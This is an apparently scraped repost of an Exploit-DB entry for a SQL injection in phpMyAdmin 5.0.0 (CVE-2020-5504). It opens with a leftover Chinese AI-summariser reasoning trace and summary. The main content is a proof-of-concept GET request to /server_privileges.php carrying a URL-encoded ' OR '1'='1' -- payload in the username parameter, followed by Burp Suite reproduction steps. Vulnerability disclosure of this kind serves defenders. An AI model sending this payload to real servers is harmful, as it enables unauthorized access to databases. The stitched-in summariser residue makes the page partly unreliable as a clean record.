[webapps] phpMyAdmin 5.0.0 - SQL Injection
嗯,用户让我总结一下这篇文章的内容,控制在100字以内,而且不需要特定的开头。首先,我需要仔细阅读文章内容。 文章标题是phpMyAdmin 5.0.0的SQL注入漏洞,CVE编号是CVE-2020-5504。作者是CodeSecLab,日期是2025年11月25日。软件链接在GitHub上。测试环境是Windows。 漏洞的描述部分提到攻击者需要一个有效的MySQL账户来访问服务器。攻击步骤包括登录phpMyAdmin,使用Burp Suite这样的工具拦截并发送恶意请求,确保包含有效的会话cookie,然后观察结果。 证明概念部分有一个GET请求,路径是/server_privileges.php,参数包括ajax_request、validate_username和username。用户名被构造为一个SQL注入字符串。 所以总结的时候需要涵盖漏洞名称、版本、攻击条件和利用步骤。控制在100字以内的话,应该包括:phpMyAdmin 5.0.0存在SQL注入漏洞(CVE-2020-5504),攻击者需有有效MySQL账户,在server_privileges.php页面利用构造的请求实现注入。 </think> phpMyAdmin 5.0.0 存在 SQL 注入漏洞(CVE-2020-5504),攻击者通过构造恶意请求访问 `server_privileges.php` 页面,在具备有效 MySQL 账户的情况下可触发注入。 2025-12-3 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:8 收藏

# Exploit Title: phpMyAdmin 5.0.0 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpmyadmin/phpmyadmin/
# Software Link: https://github.com/phpmyadmin/phpmyadmin/
# Version: 5.0.0 
# Tested on: Windows
# CVE : CVE-2020-5504


Proof Of Concept
GET /server_privileges.php?ajax_request=true&validate_username=set&username=%27%20OR%20%271%27%3D%271%27%20--%20 HTTP/1.1
Host: phpmyadmin
Connection: close

# Additional conditions:
# - The attacker must have a valid MySQL account to access the server.


Steps to Reproduce
Log in phpmyadmin.
Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie.
Observe the result.
            

文章来源: https://www.exploit-db.com/exploits/52451
如有侵权请联系:admin#unsafe.sh